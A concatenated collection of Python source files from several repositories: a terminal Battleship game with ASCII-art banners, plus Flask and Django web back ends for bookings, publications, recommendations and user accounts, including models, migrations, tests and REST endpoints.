f'╝ ╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚══════╝']
congratulations = [f' ██████╗ ██████╗ ███╗ ██╗ ██████╗ ██████╗ █████╗ █'
f'███████╗██╗ ██╗██╗ █████╗ ████████╗██╗ ██████╗'
f' ███╗ ██╗███████╗██╗',
f'██╔════╝██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔══██╗╚'
f'══██╔══╝██║ ██║██║ ██╔══██╗╚══██╔══╝██║██╔═══██'
f'╗████╗ ██║██╔════╝██║',
f'██║ ██║ ██║██╔██╗ ██║██║ ███╗██████╔╝███████║ '
f' ██║ ██║ ██║██║ ███████║ ██║ ██║██║ ██'
f'║██╔██╗ ██║███████╗██║',
f'██║ ██║ ██║██║╚██╗██║██║ ██║██╔══██╗██╔══██║ '
f' ██║ ██║ ██║██║ ██╔══██║ ██║ ██║██║ ██'
f'║██║╚██╗██║╚════██║╚═╝',
f'╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║ ██║██║ ██║ '
f' ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║╚██████╔'
f'╝██║ ╚████║███████║██╗',
f' ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ '
f' ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝'
f' ╚═╝ ╚═══╝╚══════╝╚═╝']
ret = '\n' * 23
for i in range(len(battle_is_over)):
ret += f'{battle_is_over[i]:^310}\n'
ret += '\n'
for i in range(len(victorious)):
ret += f'{victorious[i]:^310}\n'
ret += '\n'
for i in range(len(congratulations)):
ret += f'{congratulations[i]:^310}\n'
ret += '\n' * 24
print(ret)
press_to_continue()
def congratulate_p2() -> None:
"""
Prints a congratulatory message for player 2 who won the game.
"""
battle_is_over = [f'██████╗ █████╗ ████████╗████████╗██╗ ███████╗ '
f'██╗███████╗ ██████╗ ██╗ ██╗███████╗██████╗ ',
f'██╔══██╗██╔══██╗╚══██╔══╝╚══██╔══╝██║ ██╔════╝ '
f'██║██╔════╝ ██╔═══██╗██║ ██║██╔════╝██╔══██╗',
f'██████╔╝███████║ ██║ ██║ ██║ █████╗ '
f'██║███████╗ ██║ ██║██║ ██║█████╗ ██████╔╝',
f'██╔══██╗██╔══██║ ██║ ██║ ██║ ██╔══╝ '
f'██║╚════██║ ██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗',
f'██████╔╝██║ ██║ ██║ ██║ ███████╗███████╗ '
f'██║███████║ ╚██████╔╝ ╚████╔╝ ███████╗██║ ██║',
f'╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚══════╝ '
f'╚═╝╚══════╝ ╚═════╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝']
victorious = [f'██████╗ ██╗ █████╗ ██╗ ██╗███████╗██████╗ █████'
f'█╗ ██╗███████╗ ██╗ ██╗██╗ ██████╗████████╗ ██████'
f'╗ ██████╗ ██╗ ██████╗ ██╗ ██╗███████╗',
f'██╔══██╗██║ ██╔══██╗╚██╗ ██╔╝██╔════╝██╔══██╗ ╚════'
f'██╗ ██║██╔════╝ ██║ ██║██║██╔════╝╚══██╔══╝██╔═══█'
f'█╗██╔══██╗██║██╔═══██╗██║ ██║██╔════╝',
f'██████╔╝██║ ███████║ ╚████╔╝ █████╗ ██████╔╝ ████'
f'█╔╝ ██║███████╗ ██║ ██║██║██║ ██║ ██║ █'
f'█║██████╔╝██║██║ ██║██║ ██║███████╗',
f'██╔═══╝ ██║ ██╔══██║ ╚██╔╝ ██╔══╝ ██╔══██╗ ██╔══'
f'═╝ ██║╚════██║ ╚██╗ ██╔╝██║██║ ██║ ██║ █'
f'█║██╔══██╗██║██║ ██║██║ ██║╚════██║',
f'██║ ███████╗██║ ██║ ██║ ███████╗██║ ██║ █████'
f'██╗ ██║███████║ ╚████╔╝ ██║╚██████╗ ██║ ╚██████'
f'╔╝██║ ██║██║╚██████╔╝╚██████╔╝███████║',
f'╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚════'
f'══╝ ╚═╝╚══════╝ ╚═══╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════'
f'╝ ╚═╝ ╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚══════╝']
congratulations = [f' ██████╗ ██████╗ ███╗ ██╗ ██████╗ ██████╗ █████╗ █'
f'███████╗██╗ ██╗██╗ █████╗ ████████╗██╗ ██████╗'
f' ███╗ ██╗███████╗██╗',
f'██╔════╝██╔═══██╗████╗ ██║██╔════╝ ██╔══██╗██╔══██╗╚'
f'══██╔══╝██║ ██║██║ ██╔══██╗╚══██╔══╝██║██╔═══██'
f'╗████╗ ██║██╔════╝██║',
f'██║ ██║ ██║██╔██╗ ██║██║ ███╗██████╔╝███████║ '
f' ██║ ██║ ██║██║ ███████║ ██║ ██║██║ ██'
f'║██╔██╗ ██║███████╗██║',
f'██║ ██║ ██║██║╚██╗██║██║ ██║██╔══██╗██╔══██║ '
f' ██║ ██║ ██║██║ ██╔══██║ ██║ ██║██║ ██'
f'║██║╚██╗██║╚════██║╚═╝',
f'╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║ ██║██║ ██║ '
f' ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║╚██████╔'
f'╝██║ ╚████║███████║██╗',
f' ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ '
f' ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝'
f' ╚═╝ ╚═══╝╚══════╝╚═╝']
ret = '\n' * 23
for i in range(len(battle_is_over)):
ret += f'{battle_is_over[i]:^310}\n'
ret += '\n'
for i in range(len(victorious)):
ret += f'{victorious[i]:^310}\n'
ret += '\n'
for i in range(len(congratulations)):
ret += f'{congratulations[i]:^310}\n'
ret += '\n' * 24
print(ret)
press_to_continue()
```
#### File: Objects/Mechanics/Order.py
```python
from typing import Tuple
from Settings import PURPLE, DEFAULT
class TraditionalOrder:
"""
The general command class used in Traditional Battleship to plan player
moves.
Attribute(s):
- order_id: The order number
- coordinate: The node that is being targeted (col, row)
"""
order_id: int
coordinate: Tuple[str, str]
def __init__(self, num: int, coord: Tuple[str, str]) -> None:
"""
Initializes a new Order.
Parameter(s):
- num: The order num
- coord: The coordinate of the node being targeted (col, row)
"""
self.order_id = num
self.coordinate = coord
def __str__(self) -> str:
return f'{PURPLE}{self.order_id:02d}{DEFAULT} | ' \
f'Targeting ({self.coordinate[0]}, {self.coordinate[1]})'
```
#### File: Objects/Vessels/Submarine.py
```python
from __future__ import annotations
from Objects.Vessels.Vessel import TraditionalVessel
# Due to a circular import, these constants cannot be imported from Settings.py
GREEN = '\033[32m' # Green
YELLOW = '\033[33m' # Yellow
RED = '\033[31m' # Red
class TraditionalSubmarine(TraditionalVessel):
"""The Submarine vessel class used for Traditional Battleship."""
def __init__(self, nation: str, name: str, pennant: int) -> None:
"""
Initializes a new Submarine.
Parameter(s):
- nation: The affiliated nation
- name: The name of the vessel
- pennant: The id number of the vessel
"""
super().__init__(nation, name, pennant)
self.type = 'Submarine'
self.abbrev = 'SM'
self.symbol = 'S'
self.hp = 4
self.hits_received = 0
self.health_color = f'{GREEN}'
self.enemy_hp_color = f'{RED}'
def __copy__(self) -> TraditionalSubmarine:
ret = TraditionalSubmarine(self.nation, self.name, self.pennant)
ret.hp = self.hp
ret.hits_received = self.hits_received
ret.health_color = self.health_color
ret.enemy_hp_color = self.enemy_hp_color
ret.sunk = self.sunk
ret.bow = self.bow
ret.hit = self.hit
return ret
def update_health_color(self) -> None:
if self.hp == 4:
return
elif self.hp > 1:
self.health_color = f'{YELLOW}'
self.enemy_hp_color = f'{YELLOW}'
else:
self.health_color = f'{RED}'
self.enemy_hp_color = f'{GREEN}'
``` |
{
"source": "754844887/flasky",
"score": 2
} |
#### File: flasky/app/__init__.py
```python
from flask import Flask
import config
from flask_wtf import CSRFProtect
from flask_wtf.csrf import generate_csrf
from flask_cors import CORS
from .auth import api_bp
from .models import db
from .main import main_bp
def create_app():
app = Flask(__name__)
app.config.from_object(config)
db.init_app(app)
app.register_blueprint(api_bp)
app.register_blueprint(main_bp)
csrf = CSRFProtect()
csrf.init_app(app)
cors = CORS()
cors.init_app(app)
return app
app = create_app()
# Generate a csrf_token and set it as a cookie for form CSRF validation
# @app.after_request
# def after_request(response):
# csrf_token = generate_csrf()
# response.set_cookie('csrf_token', csrf_token)
# return response
``` |
{
"source": "754Bree/Django-ip-3",
"score": 3
} |
#### File: Django-ip-3/awwards/tests.py
```python
from django.test import TestCase
from .models import Profile,Projects
from django.contrib.auth.models import User
# Create your tests here.
class ProfileTest(TestCase):
def setUp(self):
self.briana = User(username = 'briana',email = '<EMAIL>')
self.briana = Profile(user = self.briana,bio = 'tests',image = 'test.jpg')
def test_instance(self):
        self.assertTrue(isinstance(self.briana, Profile))
def test_save_profile(self):
        self.briana.save_profile()
        all_profiles = Profile.objects.all()
        self.assertTrue(len(all_profiles) > 0)
class ProjectsTestCase(TestCase):
def setUp(self):
self.new_post = Projects(title = 'testT',image = 'test.jpg',description = 'testD',link = 'https://test.com',created_date='Jan,25.2021')
    def test_save_project(self):
        self.new_post.save_project()
        projects = Projects.objects.all()
        self.assertEqual(len(projects), 1)
    def test_delete_project(self):
        self.new_post.save_project()
        self.new_post.delete_project()
        projects = Projects.objects.all()
        self.assertEqual(len(projects), 0)
``` |
{
"source": "7552-2020C2-grupo5/bookings-microservice",
"score": 2
} |
#### File: bookings-microservice/booking_microservice/api.py
```python
from flask_restx import Api
from booking_microservice import __version__
from booking_microservice.namespaces.bookings import api as bookings_namespace
from booking_microservice.namespaces.metrics import api as metrics_namespace
from booking_microservice.namespaces.token import api as token_namespace
api = Api(
prefix="/v1",
version=__version__,
title="Bookings API",
description="Bookings microservice for BookBNB",
default="Bookings",
default_label="Bookings operations",
validate=True,
)
api.add_namespace(bookings_namespace, path='/bookings')
api.add_namespace(metrics_namespace, path='/metrics')
api.add_namespace(token_namespace, path='/token')
@api.errorhandler
def handle_exception(error: Exception):
"""When an unhandled exception is raised"""
message = "Error: " + getattr(error, 'message', str(error))
return {'message': message}, getattr(error, 'code', 500)
```
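The `Api` object above only declares the namespaces and the `/v1` prefix; it still has to be attached to a Flask application somewhere. A minimal, hypothetical wiring sketch follows (the real project presumably does this in its own app factory, which is not shown here); only the import path is taken from the file above, everything else is illustrative.
```python
# Hypothetical sketch, not part of the repository: mounting the flask-restx Api
# defined above on a bare Flask app.
from flask import Flask

from booking_microservice.api import api

app = Flask(__name__)
api.init_app(app)  # registers the namespaces under the /v1 prefix

if __name__ == "__main__":
    app.run(debug=True)
```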
#### File: migrations/versions/7eb209b7ab1e_booking_status.py
```python
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
from booking_microservice.constants import BookingStatus
# revision identifiers, used by Alembic.
revision = '7eb209b7ab1e'
down_revision = '0a95c6679356'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
connection = op.get_bind()
if connection.dialect.name == "postgresql":
status_enum = postgresql.ENUM(
*[x.value for x in BookingStatus.__members__.values()],
name='booking_status'
)
else:
status_enum = sa.Enum(
*[x.value for x in BookingStatus.__members__.values()],
name='booking_status'
)
status_enum.create(op.get_bind())
op.add_column(
'booking',
sa.Column(
'booking_status',
status_enum,
nullable=False,
default=BookingStatus.PENDING.value,
server_default=BookingStatus.PENDING.value,
),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('booking', 'booking_status')
# ### end Alembic commands ###
``` |
{
"source": "7552-2020C2-grupo5/publications-microservice",
"score": 2
} |
#### File: migrations/versions/9ae88ecbc099_add_star_model.py
```python
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '9ae88ecbc099'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
'publication_star',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('publication_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['publication_id'], ['publication.id'],),
sa.PrimaryKeyConstraint('id'),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('publication_star')
# ### end Alembic commands ###
```
#### File: migrations/versions/fd36afc3738d_blockchain_fields.py
```python
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
from publications_microservice.constants import BlockChainStatus
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
status_enum = postgresql.ENUM(
'CONFIRMED', 'DENIED', 'PENDING', 'UNSET', 'ERROR', name='blockchain_status'
)
status_enum.create(op.get_bind())
op.add_column(
'publication', sa.Column('blockchain_id', sa.Integer(), nullable=True)
)
op.add_column(
'publication',
sa.Column(
'blockchain_status',
status_enum,
nullable=False,
default=BlockChainStatus.UNSET.value,
server_default=BlockChainStatus.UNSET.value,
),
)
op.add_column(
'publication',
sa.Column('blockchain_transaction_hash', sa.String(length=512), nullable=True),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('publication', 'blockchain_transaction_hash')
op.drop_column('publication', 'blockchain_status')
op.drop_column('publication', 'blockchain_id')
    op.execute("DROP TYPE blockchain_status")
# ### end Alembic commands ###
```
#### File: publications-microservice/publications_microservice/models.py
```python
from uuid import uuid4
from flask_sqlalchemy import SQLAlchemy
from geoalchemy2.types import Geography
from sqlalchemy.sql import func
from sqlalchemy_utils import UUIDType
from publications_microservice.constants import BlockChainStatus
db = SQLAlchemy()
class Publication(db.Model): # type: ignore
"""Publications model."""
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, nullable=False)
title = db.Column(db.String)
description = db.Column(db.String)
rooms = db.Column(
db.Integer, db.CheckConstraint('rooms >= 0', name='rooms_nonnegative')
)
beds = db.Column(
db.Integer, db.CheckConstraint('beds >= 0', name='beds_nonnegative')
)
bathrooms = db.Column(
db.Integer, db.CheckConstraint('bathrooms >= 0', name='bathrooms_nonnegative')
)
price_per_night = db.Column(
db.Numeric,
db.CheckConstraint('price_per_night > 0', name='price_per_night_nonnegative'),
)
loc = db.Column(Geography(geometry_type='POINT', srid=4326))
publication_date = db.Column(db.DateTime, nullable=False, default=func.now())
blocked = db.Column(db.Boolean, default=False)
blockchain_status = db.Column(
db.Enum(BlockChainStatus), nullable=False, default=BlockChainStatus.UNSET.value,
)
blockchain_transaction_hash = db.Column(db.String(512), nullable=True)
blockchain_id = db.Column(db.Integer, nullable=True)
images = db.relationship("PublicationImage", backref="publication", lazy=True)
questions = db.relationship("PublicationQuestion", backref="publication", lazy=True)
stars = db.relationship("PublicationStar", backref="publication", lazy=True)
def update_from_dict(self, **kwargs):
for field, value in kwargs.items():
setattr(self, field, value)
class PublicationImage(db.Model): # type: ignore
"""Images for publications."""
id = db.Column(UUIDType(binary=False), primary_key=True, default=uuid4)
url = db.Column(db.String, nullable=False)
publication_id = db.Column(
db.Integer, db.ForeignKey('publication.id'), nullable=False
)
# TODO: validate URLs
class PublicationQuestion(db.Model): # type: ignore
"""Public questions for publications."""
id = db.Column(db.Integer, primary_key=True)
question = db.Column(db.String, nullable=False)
reply = db.Column(db.String, nullable=True)
created_at = db.Column(db.DateTime, nullable=False, default=func.now())
replied_at = db.Column(db.DateTime, nullable=True)
user_id = db.Column(db.Integer, nullable=False)
publication_id = db.Column(
db.Integer, db.ForeignKey('publication.id'), nullable=False
)
class PublicationStar(db.Model): # type: ignore
"""Publication stars."""
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, nullable=False)
created_at = db.Column(db.DateTime, nullable=False, default=func.now())
publication_id = db.Column(
db.Integer, db.ForeignKey('publication.id'), nullable=False
)
``` |
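The `loc` column uses a geoalchemy2 `Geography(POINT, srid=4326)` type, so locations are written as WKT points (longitude first). Below is a hedged usage sketch, assuming an application context and database session are already set up as in the rest of the service; the field values are invented.
```python
# Illustrative only: made-up values, and db.session is assumed to be bound to an
# app context created elsewhere in the service.
from geoalchemy2.elements import WKTElement

from publications_microservice.models import Publication, db

new_pub = Publication(
    user_id=1,
    title="Cozy loft",
    description="Two blocks from the river",
    rooms=2,
    beds=3,
    bathrooms=1,
    price_per_night=42,
    loc=WKTElement("POINT(-58.3816 -34.6037)", srid=4326),  # lon lat order
)
db.session.add(new_pub)
db.session.commit()
```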
{
"source": "7552-2020C2-grupo5/recommendations_microservice",
"score": 2
} |
#### File: recommendations_microservice/recommendations_microservice/app.py
```python
import logging
from pathlib import Path
import requests
from flask import Flask, request
from flask_cors import CORS
from flask_migrate import Migrate
from werkzeug.middleware.proxy_fix import ProxyFix
from recommendations_microservice.api import api
from recommendations_microservice.cfg import config
from recommendations_microservice.constants import DEFAULT_VERIFICATION_URL
from recommendations_microservice.models import db
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def fix_dialect(s):
if s.startswith("postgres://"):
s = s.replace("postgres://", "postgresql://")
s = s.replace("postgresql://", "postgresql+psycopg2://")
return s
def before_request():
excluded_paths = [
"/",
"/v1/swagger.json",
"/swagger.json",
"/swaggerui/favicon-32x32.png",
"/swaggerui/swagger-ui-standalone-preset.js",
"/swaggerui/swagger-ui-standalone-preset.js",
"/swaggerui/swagger-ui-bundle.js",
"/swaggerui/swagger-ui.css",
"/swaggerui/droid-sans.css",
]
if (
config.env(default="DEV") == "DEV"
or request.path in excluded_paths
or request.method == "OPTIONS"
):
return
bookbnb_token = request.headers.get("BookBNBAuthorization")
if bookbnb_token is None:
return {"message": "BookBNB token is missing"}, 401
r = requests.post(
config.token_verification_url(default=DEFAULT_VERIFICATION_URL),
json={"token": bookbnb_token},
headers={"BookBNBAuthorization": config.bookbnb_token(default="_")},
)
if not r.ok:
return {"message": "Invalid BookBNB token"}, 401
def create_app(test_db=None):
"""creates a new app instance"""
new_app = Flask(__name__)
new_app.config["SQLALCHEMY_DATABASE_URI"] = config.database.url(
default=test_db or "sqlite:///recommendations_microservice.db", cast=fix_dialect
)
new_app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
new_app.config["ERROR_404_HELP"] = False
db.init_app(new_app)
api.init_app(new_app)
Migrate(new_app, db, directory=Path(__file__).parent / "migrations")
new_app.wsgi_app = ProxyFix(
new_app.wsgi_app, x_for=1, x_proto=1, x_host=1, x_port=1
) # remove after flask-restx > 0.2.0 is released
# https://github.com/python-restx/flask-restx/issues/230
CORS(new_app)
new_app.before_request(before_request)
return new_app
``` |
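Outside the `DEV` environment, `before_request` rejects any request to a non-whitelisted path that does not carry a valid `BookBNBAuthorization` header. A hedged client-side sketch: the host, endpoint and token below are placeholders, not taken from the project; only the header name comes from the hook above.
```python
# Placeholder host, path and token; illustrates the 401 behaviour of before_request.
import requests

resp = requests.get(
    "https://recommendations.example.com/v1/recommendations",
    headers={"BookBNBAuthorization": "<bookbnb-jwt>"},
)
if resp.status_code == 401:
    print("BookBNB token missing or rejected by the verification service")
```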
{
"source": "7552-2020C2-grupo5/users-microservice",
"score": 3
} |
#### File: users_microservice/controllers/oauth.py
```python
import logging
import jwt
import requests
from jwt import PyJWKClient
from users_microservice.cfg import config
from users_microservice.constants import (
DEFAULT_AUDIENCE,
DEFAULT_GOOGLE_OPENID_CFG_JWKS_KEY,
DEFAULT_GOOGLE_OPENID_CFG_URI,
)
from users_microservice.exceptions import EmailAlreadyRegistered
from users_microservice.models import User, db
from users_microservice.utils import split_list
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def validated_token(token, verify=True):
"""Validate a token and return decoded token."""
url = (
requests.get(
config.oauth.google_openid_config_uri(default=DEFAULT_GOOGLE_OPENID_CFG_URI)
)
.json()
.get(
config.oauth.google_openid_jkws_key(
default=DEFAULT_GOOGLE_OPENID_CFG_JWKS_KEY
)
)
)
logger.info("JWK url is %s", url)
jwks_client = PyJWKClient(url)
signing_key = jwks_client.get_signing_key_from_jwt(token)
data = jwt.decode(
token,
signing_key.key,
algorithms=["RS256"],
audience=config.oauth.audience(default=DEFAULT_AUDIENCE, cast=split_list),
options={"verify_signature": verify},
)
return data
def oauth_user(token):
"""Get user from token."""
decoded_token = validated_token(token, False)
user = User.query.filter(User.email == decoded_token["email"]).first()
return user
def create_oauth_user(token, wallet_address, wallet_mnemonic):
"""Create a new user from OAuth token."""
if oauth_user(token) is not None:
raise EmailAlreadyRegistered
data = validated_token(token)
new_user_data = {
"first_name": data["given_name"],
"last_name": data["family_name"],
"password": data["sub"],
"profile_picture": data["picture"],
"wallet_address": wallet_address,
"wallet_mnemonic": wallet_mnemonic,
"email": data["email"],
}
new_user = User(**new_user_data)
db.session.add(new_user)
db.session.commit()
return new_user
```
#### File: migrations/versions/e792232e04c7_add_admin_model.py
```python
from datetime import datetime as dt
from alembic import op
import sqlalchemy as sa
import sqlalchemy_utils
from users_microservice.models import AdminUser
# revision identifiers, used by Alembic.
revision = 'e792232e04c7'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
admin_user_table = op.create_table(
'admin_user',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('first_name', sa.String(), nullable=False),
sa.Column('last_name', sa.String(), nullable=False),
sa.Column('_password', sa.String(), nullable=False),
sa.Column(
'email', sqlalchemy_utils.types.email.EmailType(length=255), nullable=False
),
sa.Column('register_date', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email'),
)
op.bulk_insert(
admin_user_table,
[
{
"first_name": "Admin",
"last_name": "BookBNB",
"_password": <PASSWORD>User._hash_pasword("<PASSWORD>"),
"email": "<EMAIL>",
"register_date": dt.now(),
}
],
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('admin_user')
# ### end Alembic commands ###
```
#### File: users_microservice/namespaces/users.py
```python
import operator as ops
import jwt
import sendgrid
from email_validator import EmailNotValidError
from flask_restx import Model, Namespace, Resource, fields, marshal, reqparse
from sendgrid.helpers.mail import Content, Email, Mail, To
from users_microservice import __version__
from users_microservice.cfg import config
from users_microservice.constants import DEFAULT_RESET_PWD_EMAIL, DEFAULT_RESET_PWD_LEN
from users_microservice.exceptions import (
BlockedUser,
EmailAlreadyRegistered,
PasswordDoesNotMatch,
UserDoesNotExist,
)
from users_microservice.models import BlacklistToken, User, db
from users_microservice.utils import FilterParam, generate_random_password
api = Namespace("Users", description="Users operations",)
auth_parser = api.parser()
auth_parser.add_argument('Authorization', type=str, location='headers', required=True)
@api.errorhandler(UserDoesNotExist)
def handle_user_does_not_exist(_error: UserDoesNotExist):
"""Handle missing user errors."""
return {"message": "User does not exist"}, 404
@api.errorhandler(BlockedUser)
def handle_blocked_user(_error: BlockedUser):
"""Handle blocked users."""
return {"message": "User has been blocked"}, 403
base_user_model = Model(
"User base model",
{
"id": fields.Integer(readonly=True, description="The user unique identifier"),
"first_name": fields.String(required=True, description='The user first name'),
"last_name": fields.String(required=True, description='The user last name'),
"profile_picture": fields.String(
required=False, description="URL pointing to the user's profile picture"
),
"email": fields.String(required=True, description='The user email'),
},
)
edit_model = api.model(
"User edit model",
{
"first_name": fields.String(required=False, description='The user first name'),
"last_name": fields.String(required=False, description='The user last name'),
"profile_picture": fields.String(
required=False, description="URL pointing to the user's profile picture"
),
},
)
profile_model = base_user_model.clone(
"User profile model",
{
"register_date": fields.DateTime(
description='The date the user joined bookbnb'
),
"blocked": fields.Boolean(description="Is blocked?"),
},
)
api.models[profile_model.name] = profile_model
register_model = base_user_model.clone(
"User register model",
{
"password": fields.String(
required=True, description='The password for the new user'
),
"wallet_address": fields.String(
required=True, description='The wallet address for the new user'
),
"wallet_mnemonic": fields.String(
required=True, description='The wallet mnemonic for the new user'
),
},
)
api.models[register_model.name] = register_model
registered_model = profile_model.clone(
"New user model",
{
"token": fields.String(
required=True, attribute='password', description='The jwt'
)
},
)
api.models[registered_model.name] = registered_model
login_model = api.model(
"User login model",
{
"email": fields.String(required=True, description='The user email'),
"password": fields.String(required=True, description='The user password'),
},
)
wallet_model = api.model(
"User Wallet Model", {"address": fields.String(description="The wallet address")},
)
password_reset_model = api.model(
"Reset password model",
{"email": fields.String(required=True, description="The user email")},
)
api.models[password_reset_model.name] = password_reset_model
logged_model = api.model("Logged in User model", {"token": fields.String})
error_model = api.model("Error Model", {"message": fields.String})
user_parser = reqparse.RequestParser()
user_parser.add_argument(
"first_name",
type=FilterParam("first_name", ops.contains, schema=str),
help="First name to filter on",
store_missing=False,
)
user_parser.add_argument(
"last_name",
type=FilterParam("last_name", ops.contains, schema=str),
help="Last name to filter on",
store_missing=False,
)
user_parser.add_argument(
"email",
type=FilterParam("email", ops.contains, schema=str),
help="Email to filter on",
store_missing=False,
)
def conditional_filter(attr, val):
if val == True: # noqa: E712
return attr == False # noqa: E712
else:
return 1 == 1
user_parser.add_argument(
"filter_blocked",
type=FilterParam(
"filter_blocked",
conditional_filter,
attribute="blocked",
schema=bool,
transform={"true": True, "false": False}.get,
),
store_missing=True,
default="true",
)
@api.route('')
class UserListResource(Resource):
@api.doc('list_users_profiles')
@api.marshal_list_with(profile_model)
@api.expect(user_parser)
def get(self):
"""Get all users."""
params = user_parser.parse_args()
query = User.query
for filter_name, filter_op in params.items():
if not isinstance(filter_op, FilterParam):
if filter_op is None:
continue
for i in user_parser.args:
if i.name == filter_name:
filter_op = i.type(filter_op)
break
if not isinstance(filter_op, FilterParam):
continue
query = filter_op.apply(query, User)
return query.all()
@api.doc('user_register')
@api.expect(register_model)
@api.response(201, 'Successfully registered', model=registered_model)
@api.response(409, 'User already registered')
@api.response(400, 'Invalid email')
def post(self):
try:
new_user = User(**api.payload)
db.session.add(new_user)
db.session.commit()
return api.marshal(new_user, registered_model), 201
except EmailAlreadyRegistered:
return {"message": "The email has already been registered."}, 409
except EmailNotValidError:
return {"message": "The email is not valid"}, 400
@api.route('/<int:user_id>')
@api.param('user_id', 'The user unique identifier')
@api.response(404, 'User not found')
@api.response(403, 'User is blocked')
class UserResource(Resource):
@api.doc('get_user_profile_by_id')
@api.marshal_with(profile_model)
def get(self, user_id):
"""Get a user by id."""
user = User.query.filter(User.id == user_id).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
return user
@api.expect(edit_model)
@api.marshal_with(profile_model)
def put(self, user_id):
"""Replace a user by id."""
user = User.query.filter(User.id == user_id).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
user.update_from_dict(**api.payload)
db.session.merge(user)
db.session.commit()
return user
@api.doc('block_user')
@api.response(200, "User correctly blocked")
def delete(self, user_id):
"""Block a user by id."""
user = User.query.filter(User.id == user_id).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
user.blocked = True
db.session.merge(user)
blocked_token = BlacklistToken(token=user.jwt)
db.session.add(blocked_token)
db.session.commit()
return {"message": "The user has been blocked"}, 200
@api.route('/reset_password')
@api.response(201, 'Success')
@api.response(404, 'User not found')
@api.response(403, 'User is blocked')
class ResetPasswordResource(Resource):
@api.expect(password_reset_model)
def post(self):
"""Reset user password"""
email = api.payload["email"]
user = User.query.filter(User.email == email).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
new_pass = generate_random_password(DEFAULT_RESET_PWD_LEN)
        user.password = new_pass
db.session.merge(user)
db.session.commit()
sg = sendgrid.SendGridAPIClient(api_key=config.sendgrid.api_key())
email = config.reset_pwd_email(default=DEFAULT_RESET_PWD_EMAIL)
from_email = Email(email)
to_email = To(user.email)
subject = "BookBNB - Password Reset"
content_body = f"Your password has been reset. Your new password is: {<PASSWORD>}"
content = Content("text/plain", content_body)
mail = Mail(from_email, to_email, subject, content)
mail_json = mail.get()
sg.client.mail.send.post(request_body=mail_json)
return {"status": "success"}, 201
@api.route('/validate_token')
class UserTokenValidatorResource(Resource):
"""User Token Validator"""
@api.doc('validate_user_token')
@api.expect(auth_parser)
@api.response(200, "Success")
@api.response(401, "Invalid token")
@api.response(400, "Malformed token")
@api.response(403, "Blocked user")
def get(self):
parser_args = auth_parser.parse_args()
auth_token = parser_args.Authorization
try:
role = User.decode_auth_token_role(auth_token)
if role != 'user':
raise jwt.InvalidTokenError("Is not user")
user_id = User.decode_auth_token(auth_token)
user = User.query.filter(User.id == user_id).first()
            if user is None:
                raise UserDoesNotExist
            if user.blocked:
                raise BlockedUser
return {"status": "success"}, 200
except jwt.DecodeError:
return {"message": "The token sent was malformed."}, 400
except (jwt.ExpiredSignatureError, jwt.InvalidTokenError,) as e:
return {"message": str(e)}, 401
@api.route('/login')
class LoginResource(Resource):
"""User Login Resource"""
@api.expect(login_model)
@api.doc('user_login')
@api.response(201, "Success")
@api.response(401, "Invalid credentials")
@api.response(403, "User is blocked")
def post(self):
user = User.query.filter(User.email == api.payload['email']).first()
if user is None:
raise UserDoesNotExist
if user.blocked:
raise BlockedUser
try:
return (
marshal({"token": User.check_password(**api.payload)}, logged_model),
201,
)
except PasswordDoesNotMatch:
return {"message": "Password does not match."}, 401
@api.route('/logout')
class LogoutResource(Resource):
"""User Logout Resource."""
@api.doc('user_logout')
@api.expect(auth_parser)
@api.response(201, "Success")
@api.response(401, "Invalid token")
def post(self):
parser_args = auth_parser.parse_args()
